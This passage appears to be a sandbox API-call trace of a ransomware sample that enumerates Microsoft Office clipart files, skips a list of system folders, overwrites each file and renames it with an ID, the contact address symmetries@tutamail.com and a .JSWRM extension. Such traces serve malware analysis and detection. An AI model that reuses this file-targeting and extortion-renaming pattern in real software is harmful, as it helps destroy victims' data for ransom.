dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.999] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7072) returned 1 [0073.999] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ba0) returned 0x24c1d0 [0073.999] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1ba0, lpOverlapped=0x0) returned 1 [0074.003] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.003] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1ba0, lpOverlapped=0x0) returned 1 [0074.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.003] CloseHandle (hObject=0x460) returned 1 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0074.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0074.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0074.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0074.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.004] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0074.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.004] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01039_.WMF", cAlternateFileName="")) returned 1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2=".") returned 1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="..") returned 1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="...") returned 1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="windows") returned -1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="recovery") returned -1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="perflogs") returned -1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="documents and settings") returned -1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="system volume information") returned -1 [0074.004] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="msocache") returned -1 [0074.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01039_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01039_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01039_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01039_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01039_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01039_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.005] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3344) returned 1 [0074.005] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd10) returned 0x24c1d0 [0074.005] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0074.007] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.007] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0074.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.007] CloseHandle (hObject=0x460) returned 1 [0074.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0074.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0074.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.008] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.008] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x63c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01044_.WMF", cAlternateFileName="")) returned 1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2=".") returned 1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="..") returned 1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="...") returned 1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="windows") returned -1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="recovery") returned -1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="perflogs") returned -1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="documents and settings") returned -1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.008] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="system volume information") returned -1 [0074.009] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="msocache") returned -1 [0074.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01044_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01044_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01044_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01044_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01044_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01044_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.010] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1596) returned 1 [0074.010] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x23fc98 [0074.010] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0074.012] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.012] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0074.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0074.012] CloseHandle (hObject=0x460) returned 1 [0074.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.013] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f20, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01060_.WMF", cAlternateFileName="")) returned 1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2=".") returned 1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="..") returned 1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="...") returned 1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="windows") returned -1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="recovery") returned -1 [0074.013] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="perflogs") returned -1 [0074.014] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="documents and settings") returned -1 [0074.014] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.014] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="system volume information") returned -1 [0074.014] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="msocache") returned -1 [0074.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01060_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01060_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01060_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01060_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01060_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01060_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.014] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7968) returned 1 [0074.014] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f20) returned 0x24c1d0 [0074.014] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1f20, lpOverlapped=0x0) returned 1 [0074.017] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.017] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1f20, lpOverlapped=0x0) returned 1 [0074.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.017] CloseHandle (hObject=0x460) returned 1 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 